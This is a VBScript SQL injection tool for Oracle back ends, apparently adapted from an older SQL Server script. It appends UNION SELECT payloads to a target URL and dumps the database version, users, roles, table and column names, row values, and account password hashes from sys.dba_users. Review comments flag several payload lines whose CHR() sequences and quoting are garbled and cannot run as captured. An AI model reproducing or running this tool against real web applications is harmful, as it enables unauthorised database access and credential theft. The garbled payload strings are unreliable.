'***********************************************************************************************
' Oracle Union Injection Tool by lone water around the city
' Applies to injection points where a UNION SELECT can be appended; the union payload is
' hard-coded in Strurl_b below and must be adjusted by hand for each target.
' Use only against systems you are authorised to test. Output goes to the console or is
' appended to Result.txt in the working directory, depending on the DisPlay constant.
'***********************************************************************************************
' Modified from the framework of TR4C3's sql2005 injection helper script (rough version).
Const method = "Get" ' HTTP method Sqlinj uses: "Get" or "Post" (compared case-insensitively there)
Const DisPlay = "D" ' Where Resut writes: "S" appends to Result.txt in the working directory, "D" echoes to the console
' Script-level state shared with Sqlinj/Resut:
'   Strurl_b   - full target URL with the union payload and the <**> column slot
'   strURL     - part before "?" (request URL); Strarg - part after "?" (query-string template)
'   tmpstrarg  - Strarg with <**> replaced for the query currently being sent
'   currcount  - row count returned by the last "Count" query, -1 while no list is active
'   Strd       - last fragment Sqlinj cut out of a response
Dim Strurl_b, strURL, MyArray, Strarg, Strd,tmpstrarg,currcount,num
' Work out the union's column count by hand first, then find a column whose value is echoed
' on the page and put <**> in that position; every query below substitutes that slot.
Strurl_b = "Http://www.target.com/renews.jsp?id=348%20and%201=2%20union%20all%20select%20null,<**>,null, Null,null,null,null,null,null,null,null,null "' Injection points differ per target; edit this line by hand
Currcount =-1
' Split at the first "?": element 0 is the request URL, element 1 the query string holding <**>.
MyArray = Split (Strurl_b, "?",-1, 1)
strURL = MyArray (0) ' request URL
Strarg = MyArray (1) ' query-string template
Set Args = wscript.arguments
' No arguments: print usage and stop (Showu calls WScript.Quit).
If args.count = 0 Then
Showu ()
End If
'************************************************************************
' "info" mode: basic server facts (version, IP, database name, schema user,
' all users, roles, session roles, service names, account hashes).
' Each query replaces <**> with a column wrapped in Plastr's markers and then
' appends its own FROM/WHERE tail via Sqlinj.
'************************************************************************
' NOTE(review): LCase(...) can never equal a literal that contains a capital letter,
' so this branch - and the "Tables"/"Cols"/"Values" checks further down - cannot
' match as captured; the literals look title-cased by whatever copied the script.
' Confirm against the original before use.
If Args.count =1 Then
If LCase (Trim (Args (0))) = "Info" Then
Resut ("The Oracle version")
Resut ("---------------===============================--------------")
' banner column of v$version
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("banner"))
Call Sqlinj ("%20from%20v$version%20where%201=1%20--", "content")
Resut ("The Oracle IP")
Resut ("---------------===============================--------------")
' sys_context(...) with its string arguments spelled as CHR() concatenations so that no
' quote characters are needed. NOTE(review): in this copy several CHR() arguments are
' empty and the quotes are unbalanced, so the line cannot run as captured - reconstruct
' the intended argument strings before use.
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Sys_context (Chr (117)%7C%7CCHR ()%7C%7CCHR (101)%7C%7CCHR (114)% 7C%7CCHR (101)%7C%7CCHR (+)%7C%7CCHR (118), Chr%7C%7CCHR ()%7C%7CCHR ()%7C%7CCHR ()%7C%7CCHR 7CCHR (%7C%7CCHR)%7C%7CCHR (101)%7C%7CCHR (%7C%7CCHR (115)))
Call Sqlinj ("%20%20from%20dual%20where%201=1%20--", "content")
Resut ("the Database")
Resut ("---------------===============================--------------")
' name column of v$database, limited to one row
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("name"))
Call Sqlinj ("%20from%20v$database%20where%20rownum=1%20--", "content")
Resut ("The Database User")
Resut ("---------------===============================--------------")
' USER pseudo-column; user_tables only serves as a row source, rownum=1 keeps it to one row
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("user"))
Call Sqlinj ("%20%20from%20user_tables%20where%20rownum=1%20--", "content")
Resut ("The Database All Users")
Resut ("---------------===============================--------------")
' Pattern used by every list below: a COUNT(*) query sets Currcount, then one request per
' row. The nested rownum query takes the first num+1 rows (ordered desc) and keeps only
' r > num, i.e. exactly row number num+1.
' NOTE(review): the loop runs from 0 to Currcount inclusive, so it sends one request more
' than there are rows; the last one returns no markers and prints nothing.
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Count (*)"))
Call Sqlinj ("%20from%20all_users%20where%201=1%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("username"))
For Num=0 to Currcount
Call Sqlinj ("%20from%20 (select%20rownum%20r,username%20from%20 (select%20rownum%20r,username%20from%20all_users% 20where%20rownum%3c= "&num+1&"%20order%20by%201%20desc)%20t%20where%20r%3e "&num&"%20order%20by% 201) t%20where%201=1%20--"," content ")
Next
Currcount =-1
Resut ("The user Privileges")
Resut ("---------------===============================--------------")
' roles granted to the connected user (user_role_privs)
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Count (*)"))
Call Sqlinj ("%20from%20user_role_privs%20where%201=1%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Granted_role"))
For Num=0 to Currcount
Call Sqlinj ("%20from%20 (select%20rownum%20r,granted_role%20from%20 (select%20rownum%20r,granted_role%20from% 20user_role_privs%20where%20rownum%3c= "&num+1&"%20order%20by%201%20desc)%20t%20where%20r%3e "&num & "%20order%20by%201) t%20where%201=1%20--", "content")
Next
Currcount =-1
Resut ("The Session_roles")
Resut ("---------------===============================--------------")
' roles active in the current session (session_roles)
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Count (*)"))
Call Sqlinj ("%20from%20session_roles%20where%201=1%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("role"))
For Num=0 to Currcount
Call Sqlinj ("%20%20from%20 (select%20rownum%20r,role%20from%20 (select%20rownum%20r,role%20from%20session_roles% 20where%20rownum%3c= "&num+1&"%20order%20by%201%20desc)%20t%20where%20r%3e "&num&"%20order%20by% 201) t%20where%201=1%20--"," content ")
Next
Currcount =-1
Resut ("The Service_names")
Resut ("---------------===============================--------------")
' value of a v$parameter row selected by name, the name again built from CHR() calls.
' NOTE(review): the CHR() sequence and quoting in this line are incomplete as captured;
' it cannot run until the parameter name is reconstructed.
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("value"))
Call Sqlinj ("%20FROM%20V$PARAMETER%20WHERE%20NAME=CHR"%7C%7CCHR (101)%7C%7CCHR (%7C%7CCHR) 118 ( %7C%7CCHR (101)%7C%7CCHR (%7C%7CCHR)%7c%7cchr (%7C%7CCHR)%7C%7CCHR (109)%7C%7CCHR () 101 ( %20--"," content ")
Resut ("The Account Hash")
Resut ("---------------===============================--------------")
' username || password || database name || host name per sys.dba_users row, joined with
' sys.v_$database. This only works when the application's DB account can read sys.dba_users.
' NOTE(review): the CHR() separators in the row query are empty as captured and the quoting
' is unbalanced; reconstruct before use.
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Count (*)"))
Call Sqlinj ("%20from%20sys.dba_users%20where%201=1%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("a"))
For Num=0 to Currcount
Call Sqlinj ("%20from%20" (select%20rownum%20r,a%20from%20 (SELECT%20ROWNUM%20R,USERNAME%7C%7CCHR)%7C%7Cpassword %7C%7CCHR (%7C%7CNAME%7C%7CCHR)%7C%7CUTL_INADDR.GET_HOST_NAME%7C%7CCHR (+)%20as%20a%20from%20sys.dba_ Users,sys.v_$database%20where%20rownum%3c= "&num+1&"%20order%20by%201%20desc)%20t%20where%20r%3e "& num& "%20order%20by%201) t%20where%201=1%20--", "content")
Next
Currcount =-1
Wscript.Quit
End If
End If
'************************************************************************
' "tables" mode: list the tables of the connected schema (user_tables).
' The first positional argument is not used in this mode.
'************************************************************************
If args.count=2 and LCase (Trim (Args (1))) = "Tables" Then
Resut ("All the Tables")
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Count (*)"))
Call Sqlinj ("%20from%20user_tables%20where%201=1%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", PLASTR ("table_name"))
' A count of 0 or a missing count (-1) skips the per-row requests entirely.
If Currcount >0 Then
For Num=0 to Currcount
Call Sqlinj ("%20from%20 (select%20rownum%20r,table_name%20from%20 (select%20rownum%20r,table_name%20from%20user_ Tables%20where%20rownum%3c= "&num+1&"%20order%20by%201%20desc)%20t%20where%20r%3e "&num&"% 20order%20by%201) t%20where%201=1%20--"," content ")
Next
Currcount =-1
End If
Wscript.Quit
End If
'************************************************************************
' "cols" mode: list the columns of the table named by the second argument
' (user_tab_columns). The name is upper-cased and rendered through ENCODECHR
' so the comparison needs no quote characters in the URL.
'************************************************************************
If args.count=3 and LCase (Trim (Args (2))) = "Cols" Then
Resut ("The Cols of" &args (1))
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("Count (*)"))
Call Sqlinj ("%20from%20user_tab_columns%20where%20table_name=" &ENCODECHR (UCase (Trim (Args (1))) & "%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", Plastr ("column_name"))
If Currcount >0 Then
For Num=0 to Currcount
Call Sqlinj ("%20from%20 (select%20rownum%20r,column_name%20from%20 (select%20rownum%20r,column_name%20from%20user _tab_columns%20where%20rownum%3c= "&num+1&"%20and%20table_name= "&ENCODECHR (UCase (Trim (Args (1))) & "%20order%20by%201%20desc"%20t%20where%20r%3e "&num&"%20order%20by%201) t%20where%201=1%20--"," Content ")
Next
Currcount =-1
End If
Wscript.Quit
End If
'************************************************************************
' "values" mode: dump one column (third argument) of one table (second argument).
'************************************************************************
' NOTE(review): unlike every other mode this one puts the bare expression into <**>
' without Plastr, so the response carries no ^^^/~~~ markers and Sqlinj will find
' nothing to print. NOTE(review): the count query below reads the hard-coded table
' "client" while the row loop reads Args(1); the count most likely should come from
' the same table. Both look like leftovers - confirm before relying on this mode.
If args.count=4 and LCase (Trim (Args (3)) = "Values" Then
Resut ("The Value of" &args (2))
Resut ("---------------===============================--------------")
Tmpstrarg = Replace (Strarg, "<**>", "Count (*)")
Call Sqlinj ("%20from%20client%20where%201=1%20--", "Count")
Tmpstrarg = Replace (Strarg, "<**>", UCase (Trim (Args (2)))
For Num=0 to Currcount
Call Sqlinj ("%20from%20 (select%20rownum%20r," &ucase (Trim (Args (2))) & "%20from%20 (select%20rownum%20r," &ucase (Trim (args (2))) & "%20from%20" &ucase (Trim (args (1)) & "%20where%20rownum%3c=" &num+1& "%20and%201=1%20order%20by%201%20desc)%20t%20where%20r%3e" &num& "%20order%20by%201) t%20where%201=1%20-- "," content ")
Next
Wscript.Quit
End If
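'------------------------------------------------------------------------------
' Sqlinj: send one injected request and report the fragment the database
' echoed back between the Plastr markers ("^^^" ... "~~~").
'
'   Value   - URL-encoded tail of the injected SELECT ("%20from%20...%20--").
'             The script-level tmpstrarg (request parameters with <**> already
'             substituted) is prepended to it here.
'   thetype - "Count":   the fragment is a row count; it is stored in the
'                        script-level Currcount and echoed as
'                        "|_the count number [n]".
'             "Content": the fragment is echoed, indented one level deeper
'                        ("|_|_") while a count is active (Currcount <> -1).
'             Matched case-insensitively: callers pass both "content" and
'             "Content", and VBScript's "=" is case-sensitive.
'
' Reads script-level: method, strURL, tmpstrarg, Currcount.
' Writes script-level: StrD (extracted fragment, "" when markers are absent),
'                      Currcount (only for "Count").
' Any method other than GET/POST sends nothing, as in the original.
'
' Fixes over the original: the markers searched for are the three-character
' "^^^"/"~~~" that Plastr emits (the captured copy searched "^^ ^"/"~ ~ ~"
' and would have raised on the negative Mid length); a non-numeric count no
' longer crashes CInt(); the GET/POST paths share one request/parse routine.
'
' NOTE(review): Microsoft.XMLHTTP offers no request timeout, so a hanging
' target blocks the script. The HTTP status is not checked either - a marked
' fragment is accepted from any response, which is what the original did.
'------------------------------------------------------------------------------
Sub Sqlinj(ByVal Value, ByVal thetype)
    Dim payload, response, fragment
    payload = tmpstrarg & Value

    Select Case UCase(method)
        Case "GET"
            response = SqlinjSend("GET", strURL & "?" & payload, Empty)
        Case "POST"
            response = SqlinjSend("POST", strURL, UrlEncode(payload))
        Case Else
            Exit Sub
    End Select

    fragment = SqlinjExtract(response)
    StrD = fragment
    ' No markers in the page: the query produced nothing visible; print nothing.
    If fragment = "" Then Exit Sub

    Select Case LCase(Trim(thetype))
        Case "count"
            ' CLng rather than CInt: a row count above 32767 overflowed CInt.
            If IsNumeric(fragment) Then
                Currcount = CLng(fragment)
                Resut "|_the count number [" & fragment & "]"
            Else
                ' Leave Currcount untouched and show what came back instead.
                Resut "|_the count number could not be parsed: [" & fragment & "]"
            End If
        Case "content"
            If Currcount <> -1 Then
                Resut "|_|_" & fragment
            Else
                Resut "|_" & fragment
            End If
    End Select
End Sub

' SqlinjSend: perform one synchronous HTTP request and return the response text.
'   verb - "GET" or "POST"
'   url  - full request URL (query string included for GET)
'   body - POST body, Empty for GET
' Sets Referer to the bare target URL, as the original did.
Function SqlinjSend(verb, url, body)
    Dim objxml
    Set objxml = CreateObject("Microsoft.XMLHTTP")
    objxml.open verb, url, False
    If verb = "POST" Then objxml.setRequestHeader "Content-type", "application/x-www-form-urlencoded"
    objxml.setRequestHeader "Referer", strURL
    If IsEmpty(body) Then
        objxml.send
    Else
        objxml.send body
    End If
    SqlinjSend = objxml.responseText
    ' SqlinjSend = Bytes2bstr(objxml.responseBody) ' use instead for DBCS (e.g. Korean) pages
    Set objxml = Nothing
End Function

' SqlinjExtract: return the text between the first "^^^" and the next "~~~"
' after it in resp, or "" when either marker is missing. These are the
' chr(94)/chr(126) triples Plastr concatenates around the selected column.
Function SqlinjExtract(resp)
    Dim startPos, endPos
    SqlinjExtract = ""
    startPos = InStr(1, resp, "^^^", vbBinaryCompare)
    If startPos = 0 Then Exit Function
    startPos = startPos + 3
    ' Search for the closing marker only after the opening one so a stray
    ' "~~~" earlier in the page cannot yield a negative length.
    endPos = InStr(startPos, resp, "~~~", vbBinaryCompare)
    If endPos = 0 Then Exit Function
    SqlinjExtract = Mid(resp, startPos, endPos - startPos)
End Function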
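' Resut: emit one line of output, routed by the script-level DisPlay constant.
'   Strinfo - the line to write
'   DisPlay = "S": append to Result.txt in the current working directory
'   DisPlay = "D": echo to the console
'   anything else: dropped silently, as in the original
' The return value is unused; the function exists for its side effect.
' Fixes the captured "fso. OpenTextFile"/"Fso1. WriteLine" member access,
' names the ForAppending mode instead of the bare 8, and releases the
' text stream before the FileSystemObject.
Function Resut(Strinfo)
    Const ForAppending = 8
    Dim fso, logFile
    Select Case UCase(DisPlay)
        Case "S"
            Set fso = CreateObject("Scripting.FileSystemObject")
            ' Opened per call so no handle is held open across requests.
            Set logFile = fso.OpenTextFile("Result.txt", ForAppending, True)
            logFile.WriteLine Strinfo
            logFile.Close
            Set logFile = Nothing
            Set fso = Nothing
        Case "D"
            WScript.Echo Strinfo
    End Select
End Function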
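' UrlEncode: prepare a POST body for application/x-www-form-urlencoded.
'   str - the query string built from the payload template
' Only spaces are translated (to "+"). The payloads this script builds are
' already percent-encoded ("%20", "%7C"), so encoding "%" or "|" again would
' corrupt them. The captured original replaced the empty string, which is a
' no-op in VBScript, so POST bodies were sent with raw spaces.
Function UrlEncode(str)
    UrlEncode = Replace(str, " ", "+")
End Function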
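' Bytes2bstr: convert a byte string (e.g. XMLHTTP.responseBody) to a VBScript
' string, treating any byte >= &H80 as the lead byte of a two-byte (DBCS)
' character and bytes below &H80 one-to-one.
'   vIn - byte string; LenB gives its length in bytes
' Returns the decoded string. A lone lead byte at the very end is passed
' through as a single-byte character; the original read MidB past the end
' there and raised "Invalid procedure call".
' NOTE(review): Chr() of a value above 255 only succeeds under a DBCS system
' locale (the original's "Korean" comment); elsewhere it raises an error.
' Confirm before switching Sqlinj to the responseBody path.
Function Bytes2bstr(vIn)
    Dim pos, total, lead, trail, out
    out = ""
    total = LenB(vIn)
    pos = 1
    Do While pos <= total
        lead = AscB(MidB(vIn, pos, 1))
        If lead < &H80 Or pos = total Then
            out = out & Chr(lead)
            pos = pos + 1
        Else
            trail = AscB(MidB(vIn, pos + 1, 1))
            out = out & Chr(CLng(lead) * &H100 + CLng(trail))
            pos = pos + 2
        End If
    Loop
    Bytes2bstr = out
End Function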
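' ENCODECHR: render str as an Oracle concatenation of CHR() calls so a string
' literal can be injected without quote characters, e.g.
' "AB" -> "Chr (65)%7c%7cChr (66)"  (%7c%7c is the URL-encoded "||").
'   str - plain text, the table name in "cols" mode
' Returns "" for an empty string; the original's Left(..., Len - 6) raised
' "Invalid procedure call" on that input. The per-character literal is kept
' exactly as captured.
' NOTE(review): the space inside "Chr (" looks like an extraction artefact -
' every other payload in the script encodes spaces as %20 - confirm.
Function ENCODECHR(str)
    Dim pos, parts()
    If Len(str) = 0 Then
        ENCODECHR = ""
        Exit Function
    End If
    ReDim parts(Len(str) - 1)
    For pos = 1 To Len(str)
        parts(pos - 1) = "Chr (" & Asc(Mid(str, pos, 1)) & ")"
    Next
    ' Join puts the separator only between elements, so no trailing "%7c%7c" to strip.
    ENCODECHR = Join(parts, "%7c%7c")
End Function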
' plastr: wrap a column expression in the marker triples Sqlinj cuts on.
' The database concatenates three chr(94) ("^^^") in front of the value and
' three chr(126) ("~~~") after it, so the value can be located inside
' arbitrary page HTML.
'   str - column name or expression, already URL-safe
' Returns the marked-up expression; the literals are reproduced as captured.
Function plastr(str)
    Const markOpen = "Chr (94)%7C%7CCHR (94)%7C%7CCHR (94)%7c%7c"
    Const markClose = "%7C%7CCHR (126)%7C%7CCHR (126)%7C%7CCHR (126) "
    plastr = markOpen & str & markClose
End Function
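' Showu: print the usage banner and stop the script (never returns).
' The argument layout mirrors the dispatch in the main script: the first
' positional argument is a database-name placeholder inherited from the
' sql2005 original and is not read by any Oracle mode ("tables" always lists
' user_tables of the connected schema).
' Fixes the captured usage lines, which concatenated "cscript", the script
' name and the mode with no separators, and drops the "pubs.dbo.authors"
' SQL Server example that does not apply to this Oracle version.
Sub Showu()
    With WScript
        .Echo "+--------------------------=====================------------------------------+"
        .Echo "Oracle Union Injection Tool by lone water around the city"
        .Echo "Usage:"
        .Echo "cscript " & .ScriptName & " info                          -- basic server information"
        .Echo "cscript " & .ScriptName & " <db> tables                   -- table names of the connected schema (<db> is ignored)"
        .Echo "cscript " & .ScriptName & " <db> <table> cols             -- column names of <table>"
        .Echo "cscript " & .ScriptName & " <db> <table> <column> values  -- values of <column> in <table>"
        .Echo "+--------------------------=====================------------------------------+"
        .Quit
    End With
End Sub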